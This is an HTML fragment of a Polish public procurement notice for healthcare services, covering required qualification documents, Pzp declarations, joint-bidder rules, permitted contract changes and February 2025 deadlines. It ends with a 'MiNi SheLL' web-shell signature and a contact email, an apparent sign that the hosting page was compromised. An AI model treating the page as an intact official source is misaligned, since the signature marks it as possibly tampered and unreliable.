środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">6.	W celu potwierdzenia spełniania przez Wykonawcę warunków udziału w postępowaniu wskazanych w Rozdz. VIII, pkt 1, Zamawiający żąda złożenia oryginału lub kopii potwierdzonej za zgodność z oryginałem: <br/>1)	dokumenty stwierdzające posiadane kwalifikacje (dyplom, tytuł naukowy, specjalizacja, inne dokumenty potwierdzające kwalifikacje i doświadczenie zawodowe,<br/>2)	aktualny odpis z właściwego rejestru w Okręgowej Izbie Lekarskiej - dokument potwierdzający prawo wykonywania zawodu,<br/>3)	aktualną polisę ubezpieczenia od odpowiedzialności cywilnej na kwotę ubezpieczenia zgodną z wymogami Rozporządzenia Ministra Finansów z dnia 29 kwietnia 2019 r. <br/>w sprawie obowiązkowego ubezpieczenia odpowiedzialności cywilnej podmiotu wykonującego działalność leczniczą (Dz.U. z 2019 r. poz. 866),<br/>4)	wykaz osób – skierowanych przez wykonawcę do realizacji zamówienia publicznego, odpowiedzialnych za świadczenie usług zdrowotnych w danej części zamówienia, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, potwierdzających spełnianie postawionego warunku. Wzór wykazu osób stanowi wg wzoru stanowiącego Załącznik Nr 9 do SWZ.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> Zamawiający nie wymaga złożenia w postępowaniu przedmiotowych środków dowodowych. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wykonawca wraz z ofertą składa ponadto:<br/>1)	Formularz ofertowy – wg Załącznika Nr 1 do SWZ,<br/>2)	Oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp – Załącznik Nr 2 <br/>do SWZ,<br/>3)	Oświadczenie Wykonawcy, dotyczące przesłanek wykluczenia z przepisów „sankcyjnych” - Załącznik Nr 3 do SWZ,<br/>4)	Oświadczenie w zakresie art. 108 ust. 1 pkt 5 ustawy Pzp (grupa kapitałowa) – Załącznik Nr 4 do SWZ,<br/>5)	Zobowiązanie podmiotu – Załącznik Nr 6 do SWZ – jeżeli dotyczy;<br/>6)	Oświadczenie Wykonawców wspólnie ubiegających się o udzielenie zamówienia – Załącznik Nr 7 do SWZ – jeżeli dotyczy;<br/>7)	Oświadczenie o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia składane przez podmiot udostępniający zasoby składane na podstawie art. 125 ust. 5 ustawy Pzp - Załącznik Nr 8 do SWZ - jeżeli dotyczy;<br/>8)	Wykaz osób Pzp - Załącznik Nr 9 do SWZ; <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie Oświadczenie Wykonawcy o braku<br/>przynależności do tej samej grupy kapitałowej, składa każdy z wykonawców. Oświadczenia te potwierdzają brak podstaw<br/>wykluczenia oraz spełnianie warunków udziału w postępowaniu lub kryteriów selekcji w zakresie, w jakim każdy z<br/>wykonawców wykazuje spełnianie warunków udziału w postępowaniu lub kryteriów selekcji. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie<br/>zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Zamawiający<br/>nie wymaga od Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiadania określonej formy prawnej w<br/>celu złożenia oferty w postępowaniu. W odniesieniu do Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>Zamawiający nie określa wymagań związanych z realizacją zamówienia w inny sposób niż w odniesieniu do pojedynczych<br/>Wykonawców. Przepisy dotyczące Wykonawcy stosuje się odpowiednio do Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia. Zamawiający nie zastrzega obowiązku osobistego wykonania przez poszczególnych Wykonawców<br/>wspólnie ubiegających się o udzielenie zamówienia kluczowych zadań / części zamówienia. Zaleca się by jako<br/>pełnomocnika wskazać podmiot (Wykonawcę). W przypadku wskazania jako pełnomocnika osoby fizycznej zaleca się<br/>podanie informacji, którego z Wykonawców pracownikiem jest wskazana osoba. Oświadczenie, o którym mowa w art. 125<br/>ust. 1 ustawy Pzp, musi być złożone w zakresie każdego z Wykonawców wspólnie ubiegających się o zamówienie. Spółka<br/>cywilna w zamówieniach publicznych: Wspólników traktuje się jako wykonawcy wspólnie ubiegających się o udzielenie<br/>zamówienia. Stanowi o tym art. 58 ustawy Pzp. W konsekwencji powyższego wspólnicy spółki cywilnej ponoszą solidarną<br/>odpowiedzialność za prawidłowe wykonanie umowy, czy też wniesienie zabezpieczenia należytego jej wykonania, jeżeli<br/>dotyczy. Składając ofertę, wykonawcy wspólnie ubiegający się o zamówienie powinni wskazać pełnomocnika podczas<br/>postępowania i ewentualnie również upoważnionego<br/>do podpisania umowy. Wspólnicy spółki cywilnej są zobowiązani do złożenia oświadczenia o niepodleganiu wykluczeniu z<br/>postępowania o udzielenie zamówienia publicznego, o którym mowa w art. 125 ustawy Pzp. Zamawiający może określić<br/>szczególny sposób spełnienia przez wykonawców wspólnie ubiegających się o zamówienie warunków udziału w<br/>postępowaniu, zgodnie z art. 117 PZP. Dany przepis również będzie miał zastosowanie do wspólników spółki cywilnej.<br/>Istotne jest dalsze uregulowanie danego przepisu, zgodnie z którym warunek dotyczący posiadania uprawnień do<br/>prowadzenia określonej działalności jest uznawany za spełniony, gdy co najmniej jeden ze wspólników posiada takie<br/>uprawnienia. Wspólnicy mogą się także powołać na zdolności innych w celu wykazania spełnienia warunków dotyczących<br/>wykształcenia, doświadczenia czy kwalifikacji zawodowych. W sytuacji gdy wybrana została oferta spółki cywilnej,<br/>Zamawiający ma prawo żądać przed zawarciem umowy przedłożenia przez wspólników spółki cywilnej kopii umowy spółki<br/>cywilnej. W niniejszym postępowaniu Zamawiający określa warunki udziału w postępowaniu w zakresie zdolności<br/>technicznych lub zawodowych, dysponowania osobami zdolnymi do wykonania zamówienia, sytuacji finansowej lub<br/>ekonomicznej, co za tym idzie przepisy dotyczące udostępnienia zasobów będą wykorzystywane. W przypadku wspólnego<br/>ubiegania się o zamówienie Zamawiający wymaga, aby każdy z Wykonawców wziął udział w wizji lokalnej lub został<br/>ujawniony udział w wizji przedstawiciela takiego Wykonawcy. W przypadku zgłoszenia się na wizję lokalną jedynie jednego z<br/>Wykonawców występujących wspólnie (jednej firmy) bez ujawnienia udziału pozostałych podmiotów – złożenie oferty przez<br/>wykonawców występujących wspólnie będzie skutkowało odrzuceniem. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w zakresie zmiany w szczególności: cen<br/>jednostkowych brutto w przypadku zmiany ustawowej stawki podatku VAT oraz podatku akcyzowego, wysokości społecznym lub ubezpieczeniu zdrowotnemu lub wysokości stawki składki na ubezpieczenia społeczne lub ubezpieczenie<br/>zdrowotne, zasad gromadzenia i wysokości wpłat do pracowniczych planów kapitałowych, w zakresie zmian w komparycji<br/>umowy, gdy nowy Wykonawca ma zastąpić dotychczasowego Wykonawcę, takim przypadku Wykonawca zobowiązuje się<br/>przekazać Zamawiającemu wszelkie zmiany umów, w szczególności w zakresie zmiany składu Wykonawcy występującego<br/>wspólnie (konsorcjum), zmiany składu spółki cywilnej, przejęciu wykonania zamówienia lub jego części przez podmiot trzeci<br/>(podwykonawcę̨), która wykazywał spełnianie warunków udziału w postępowaniu, w wyniku sukcesji, wstępując w prawa i<br/>obowiązki Wykonawcy, w następstwie przejęcia, połączenia, podziału, przekształcenia, upadłości, restrukturyzacji,<br/>dziedziczenia lub nabycia dotychczasowego Wykonawcy, g)nastąpi zmiana powszechnie obowiązujących przepisów<br/>prawaw zakresie mającym wpływ na realizację przedmiotu umowy, wystąpienia siły wyższej, przez którą strony rozumieją<br/>zdarzenie nagłe, nieprzewidziane i niezależne od woli stron, którego skutki są niemożliwe do zapobieżenia. Zmiany umowy<br/>w zakresie terminu realizacji, przedłużenie terminu, dopuszcza się możliwość przedłużenia terminu zakończenia robót o<br/>okres trwania przyczyn, z powodu których będzie zagrożone dotrzymanie terminu zakończenia robót, przy czym będą to<br/>przyczyny niezależne od Wykonawcy, wynikające z: przestojów i opóźnień zawinionych przez Zamawiającego, będące<br/>następstwem nieterminowego przekazania terenu budowy, wystąpienia okoliczności, których strony umowy nie były w stanie<br/>przewidzieć, pomimo zachowania należytej staranności, konieczności wykonania robót zamiennych lub innych,<br/>dodatkowych, niezbędnych do wykonania przedmiotu umowy, wystąpienia braku możliwości wykonywania robót z powodu<br/>nie dopuszczenia do ich wykonywania przez uprawniony organ, zmiana terminu wykonania umowy w przypadku<br/>wystąpienia okoliczności niezależnych od Wykonawcy, w tym w razie braku możliwości lub znacznemu ograniczeniu wstępu<br/>na teren robót,<br/>zmiany w zakresie realizacji umowy przy udziale podwykonawców, zmiany umowy w zakresie osób, które będą<br/>uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za kierowanie robotami budowlanym, zmiany<br/>umowy w przypadku konieczności wykonania robót zamiennych lub innych, dodatkowych, niezbędnych do wykonania<br/>przedmiotu umowy, zmiany umowy w zakresie materiałów, parametrów technicznych, technologii wykonania robót<br/>budowlanych, sposobu i zakresu wykonania przedmiotu umowy w następujących przypadkach, konieczności zrealizowania<br/>jakiejkolwiek części robót, objętej przedmiotem umowy, przy zastosowaniu odmiennych rozwiązań technicznych lub<br/>technologicznych, niż wskazane w dokumentacji, a wynikających ze stwierdzonych wad tej dokumentacji lub zmiany stanu<br/>prawnego w oparciu, o który je przygotowano, gdyby zastosowanie przewidzianych rozwiązań groziło niewykonaniem lub<br/>nienależytym wykonaniem przedmiotu umowy, wystąpienia warunków terenu budowy odbiegających w sposób istotny od<br/>przyjętych w dokumentacji, w szczególności napotkania niezinwentaryzowanych lub błędnie zinwentaryzowanych sieci,<br/>instalacji lub innych obiektów budowlanych, konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych<br/>rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa, wystąpienia niebezpieczeństwa<br/>kolizji z planowanymi lub równolegle prowadzonymi przez inne podmioty inwestycjami w zakresie niezbędnym do uniknięcia<br/>lub usunięcia tych kolizji. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-02-20 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Ofertę wraz ze wszystkimi wymaganymi oświadczeniami i dokumentami, należy złożyć za pośrednictwem Platformy Zakupowej Marketplanet: https://szpzlo.ezamawiajacy.pl/app/login w zakładce „OFERT</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-02-20 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-03-21</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com